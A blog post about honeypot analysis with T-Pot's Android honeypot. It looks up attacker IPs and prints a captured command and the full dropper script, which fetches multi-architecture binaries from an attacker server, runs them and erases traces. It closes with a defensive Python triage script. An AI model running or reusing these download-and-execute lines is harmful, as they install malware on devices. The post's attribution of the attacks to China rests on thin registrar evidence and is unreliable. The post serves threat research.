1 Hour OSINT

Cybernaut
4 min read · Apr 30, 2021

I was recently tasked with using honeypots to study unanticipated behavior in cyberspace. Here is what I found using the AWS T-POT Honeypot framework (https://github.com/telekom-security/tpotce).

As detailed in a recent New York Times article (https://www.nytimes.com/2021/03/14/us/politics/us-hacks-china-russia.html), China is using US-based infrastructure to launch cyber attacks against the United States. Here is an example.

First, I logged into the T-Pot web interface of the Adbhoney honeypot set up in US-EAST-1 and hopped into Kibana. I then filtered on known attackers, choosing the source IP with the largest count: 209.141.51.242.

Following this, I used the Talos Intelligence and Whois plugins to find out more information on this IP address.

[Figures: Talos Intelligence screen for this particular IP; associated IP addresses from the same subnet; domain name and owner]

We see that the domain owner for this IP subnet is Chinaregistry-shanghai.org, which redirects to chinaregistry.org.cn, which means the domain is registered through China's official domain registrar.

“China’s favourite and most trusted domain name registrar” — “China Registry remains a Chinese-owned and run company”

I also took a look at the network owner, Frantech Solutions, to see where this IP address is hosted.

We can also see additional IP addresses associated with this network owner.

This analysis was performed for a honeypot data collection range of 2 weeks.

In conclusion, we see a US-based provider being used to host IP addresses that are owned by China and from which attacks against the United States are launched. The honeypot's geolocation data for this IP places it at “lat”: 36.1685, “lon”: -115.1164, Las Vegas, Nevada.

*Now we take a look at an unrelated attempt at compromise.*

[Figure: honeypot log entry; the attacker tried this 9 times, possibly automated]

The attacker IP address in this scenario is 45.144.225.228.

The full line of this command is:

cd /data/local/tmp/; wget http://31.210.20.138/sh.sh; sh sh.sh; curl http://31.210.20.138/c.sh; sh c.sh

We take a look at the first file attempt: sh.sh

Submitting this sample to hybrid-analysis yields some interesting information:

https://hybrid-analysis.com/sample/b6a5250175165b8ec44f55840a0b086769274e7e38c938865572b4cf3ef9682d

[Figures: hybrid-analysis results; the sample mostly evades AV but still gets spotted, and the cyber community has flagged this malware before]

We also use the reconnaissance tool Spiderfoot (https://www.spiderfoot.net/documentation/) to analyze the attacker IP address by automatically querying over 100 public data sources:

[Figures: Spiderfoot output showing that this IP address comes from a known malicious subnet, and a graph of relationships between the attacker IP (red node) and other associated information. The first set of nodes surrounding the IP are IP addresses from the same subnet; other nodes include email addresses, country names, netblock membership, and physical coordinates]

To extract the lines in this file, we can use the integrated tools on hybrid-analysis.com, or fetch the file directly. Note that wget writes to a file rather than to stdout, so a shell redirect would capture nothing; use -O instead:

wget -O sh.sh.txt http://31.210.20.138/sh.sh

followed by:

cat sh.sh.txt

The extracted lines of this file, one by one, are as follows:

#!/bin/sh
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm5; chmod 777 *;./arm5 Android.arm5;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm6; chmod 777 *;./arm6 Android.arm6;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm7; chmod 777 *;./arm7 Android.arm7;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm; chmod 777 *;./arm Android.arm;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/m68k; chmod 777 *;./m68k Android.m68k;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mips; chmod 777 *;./mips Android.mips;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mpsl; chmod 777 *;./mpsl Android.mpsl;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/ppc; chmod 777 *;./ppc Android.ppc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/sh4; chmod 777 *;./sh4 Android.sh4;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/spc; chmod 777 *;./spc Android.spc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/x86; chmod 777 *;./x86 Android.x86;rm -rf *;history -w;history -c

Adbhoney is an Android honeypot, so this malicious script is acting as a form of dropper malware, attempting to download and execute additional payloads.

In turn, each line of the script changes to the world-writable staging directory /data/local/tmp; downloads a further binary; makes it executable (chmod 777 *); runs it; deletes everything in the directory (rm -rf *); and then clears the shell history to hide its execution. It repeats this for binaries built for several CPU architectures (arm5, arm6, arm7, arm, m68k, mips, mpsl, ppc, sh4, spc, x86), likely to ensure that at least one of them runs on an Android device whose architecture the attacker does not know in advance.
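As an added example (not code from the original post, and not part of T-Pot, Adbhoney or hybrid-analysis), the following Python script performs offline static triage of the two captured inputs above: the one-line command logged by the honeypot and the sh.sh dropper. Both texts are embedded inline as constructed sample data copied from the post, so nothing is downloaded or executed. The signature names and the `is_multi_arch_dropper` heuristic are my own labels, not a standard taxonomy, and `restore_line_breaks` repairs the one-line form in which the script was pasted into the post.

```python
"""Static triage of a shell dropper captured by an Adbhoney honeypot.

Added example for this write-up. The script text is treated purely as
data: it is parsed for indicators and behaviours, never run.
"""
import re
from collections import OrderedDict

# The command the honeypot logged (copied from the post as sample input).
CAPTURED_COMMAND = (
    "cd /data/local/tmp/; wget http://31.210.20.138/sh.sh; sh sh.sh; "
    "curl http://31.210.20.138/c.sh; sh c.sh"
)

# The sh.sh dropper as quoted in the post, with line breaks restored.
DROPPER_SCRIPT = """#!/bin/sh
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm5; chmod 777 *;./arm5 Android.arm5;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm6; chmod 777 *;./arm6 Android.arm6;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm7; chmod 777 *;./arm7 Android.arm7;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/arm; chmod 777 *;./arm Android.arm;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/m68k; chmod 777 *;./m68k Android.m68k;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mips; chmod 777 *;./mips Android.mips;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/mpsl; chmod 777 *;./mpsl Android.mpsl;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/ppc; chmod 777 *;./ppc Android.ppc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/sh4; chmod 777 *;./sh4 Android.sh4;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/spc; chmod 777 *;./spc Android.spc;rm -rf *;history -w;history -c
cd /data/local/tmp; wget http://31.210.20.138/uwu/x86; chmod 777 *;./x86 Android.x86;rm -rf *;history -w;history -c
"""

URL_RE = re.compile(r"https?://[^\s;'\"]+")
HOST_RE = re.compile(r"https?://([^/:\s]+)")

# Behaviours a defender cares about, as regexes over the script text.
# The names are this example's own labels, not a standard taxonomy.
BEHAVIOUR_SIGNATURES = OrderedDict([
    ("remote_download", re.compile(r"\b(?:wget|curl)\b")),
    ("staging_in_tmp", re.compile(r"\bcd\s+/data/local/tmp")),
    ("world_writable_chmod", re.compile(r"\bchmod\s+777\b")),
    ("execute_downloaded", re.compile(r"(?:^|;|\s)\./\w+")),
    ("wipe_staging_dir", re.compile(r"\brm\s+-rf\s+\*")),
    ("clear_shell_history", re.compile(r"\bhistory\s+-c\b")),
])


def _dedupe(items):
    """Keep the first occurrence of each item, preserving order."""
    seen = []
    for item in items:
        if item not in seen:
            seen.append(item)
    return seen


def extract_iocs(text):
    """Return URLs, hosts, payload names and behaviour flags found in a script."""
    urls = _dedupe(URL_RE.findall(text))
    hosts = _dedupe(HOST_RE.match(u).group(1) for u in urls)
    payloads = [u.rsplit("/", 1)[-1] for u in urls]  # last path segment
    behaviours = [name for name, rx in BEHAVIOUR_SIGNATURES.items() if rx.search(text)]
    return {"urls": urls, "hosts": hosts, "payloads": payloads, "behaviours": behaviours}


def is_multi_arch_dropper(report):
    """Heuristic: several payloads, each downloaded, executed and then wiped."""
    required = {"remote_download", "execute_downloaded", "wipe_staging_dir"}
    return len(report["payloads"]) > 1 and required.issubset(report["behaviours"])


def restore_line_breaks(flat):
    """Re-insert the newlines lost when the script was pasted as one line:
    each command block ends with 'history -c' and the next begins with 'cd '."""
    flat = re.sub(r"^(#!/bin/sh)(?=cd)", r"\1\n", flat)
    return re.sub(r"(history -c)(?=cd )", r"\1\n", flat)


if __name__ == "__main__":
    for label, sample in (("captured command", CAPTURED_COMMAND),
                          ("sh.sh dropper", DROPPER_SCRIPT)):
        report = extract_iocs(sample)
        print(f"== {label} ==")
        print("hosts:     ", report["hosts"])
        print("payloads:  ", report["payloads"])
        print("behaviours:", report["behaviours"])
        print("multi-arch dropper:", is_multi_arch_dropper(report))
```

Running it against the dropper yields one distribution host, eleven architecture-specific payload names and all six behaviour flags, so the multi-arch heuristic fires; against the initial command it finds only the download and staging-directory behaviours, which is what you would expect from a first-stage loader. The host and payload lists are what you would feed into a blocklist or a hunt across other honeypot sensors.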

In the next blog post, we will take a look at the x86 malware from the last line, what it may be for, and what possible motivations the attacker may have for using it.
